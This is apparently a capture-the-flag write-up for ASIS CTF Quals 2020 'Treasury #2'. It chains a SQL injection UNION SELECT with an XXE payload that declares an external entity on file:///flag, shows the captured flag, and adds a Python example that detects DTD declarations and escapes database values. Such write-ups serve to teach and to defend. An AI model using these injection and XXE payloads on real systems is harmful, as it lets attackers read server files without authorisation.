Tags: sqli web xxe 

## Treasury #2
Before going forward, make sure to read the solution of `Treasury #1` since this part is pretty easy and just uses what we gathered in the first part.

### XXE
That being said, it is now obvious that we need to read the contents of `/flag`.
> Just if I could read files :(

Oh yes we can... XML provides us with the great feature of loading external resources through Document Type Definitions (DTD), which puts us in the territory of **XXE attacks** (XML eXternal Entity).

Here is the XML we'll be injecting to read the contents of `/flag`:
```xml
<!-- The DOCTYPE and ENTITY lines below are reconstructed from the description
     that follows; the extraction dropped them. -->
<!DOCTYPE root [
<!ENTITY flag SYSTEM "file:///flag">
]>
<root>
<excerpt>&flag;</excerpt>
</root>
```
As you can see, we use a DOCTYPE definition and declare `flag` as an external entity whose content is the `/flag` file, so when we write `&flag;` inside the `excerpt` tag, the parser replaces the `flag` "variable" with the contents of `/flag`. Let's see:
- **Query payload:** `' UNION SELECT '<!DOCTYPE root [<!ENTITY flag SYSTEM "file:///flag">]><root><excerpt>&flag;</excerpt></root>` (the DOCTYPE part is reconstructed from the description above; the extraction dropped it)
- **Explanation:** nothing much to explain, we just inject the XML as the value returned by the UNION query
- **Response:** `ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2}`, we get the second **flag** as expected, **very COOL**.
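From the defender's side, the weakness here is that a database-derived value is parsed as an XML document. The added example below (not code from the writeup) detects the DTD declarations the payload relies on using only expat callbacks, and shows that the same value embedded as escaped text becomes inert; the payload string is reconstructed from the description above and the entity/root names are taken from it.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed sample: the XXE document injected through the UNION SELECT,
# reconstructed from the writeup's description (DOCTYPE + external entity on /flag).
PAYLOAD = ('<!DOCTYPE root [<!ENTITY flag SYSTEM "file:///flag">]>'
           '<root><excerpt>&flag;</excerpt></root>')


def dtd_declarations(xml_text: str) -> list:
    """List the DOCTYPE and entity declarations present in xml_text.

    Only expat callbacks are used; nothing is fetched. A non-empty result
    means the document carries a DTD and must not reach a parser that
    resolves external entities.
    """
    found = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: found.append(("DOCTYPE", name)))
    parser.EntityDeclHandler = (
        lambda name, is_param, value, base, sysid, pubid, notation:
            found.append(("ENTITY", name, sysid)))
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input is irrelevant here; only the declarations matter
    return found


def build_excerpt(value: str) -> str:
    """Embed a database-derived value as a text node, never as markup.

    ElementTree escapes '&', '<' and '>' in text, so a row containing a
    DOCTYPE or an entity reference is serialised as inert characters.
    """
    root = ET.Element("root")
    ET.SubElement(root, "excerpt").text = value
    return ET.tostring(root, encoding="unicode")


def parse_excerpt(xml_text: str) -> str:
    """Parse a document only after confirming it declares no DTD."""
    if dtd_declarations(xml_text):
        raise ValueError("DOCTYPE/ENTITY declaration rejected")
    return ET.fromstring(xml_text).findtext("excerpt")


if __name__ == "__main__":
    print(dtd_declarations(PAYLOAD))
    print(parse_excerpt(build_excerpt(PAYLOAD)))
```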

Original writeup (https://github.com/malikDaCoda/CTFs-writeups/tree/master/web/ASIS%20CTF%20Quals%202020-Treasury).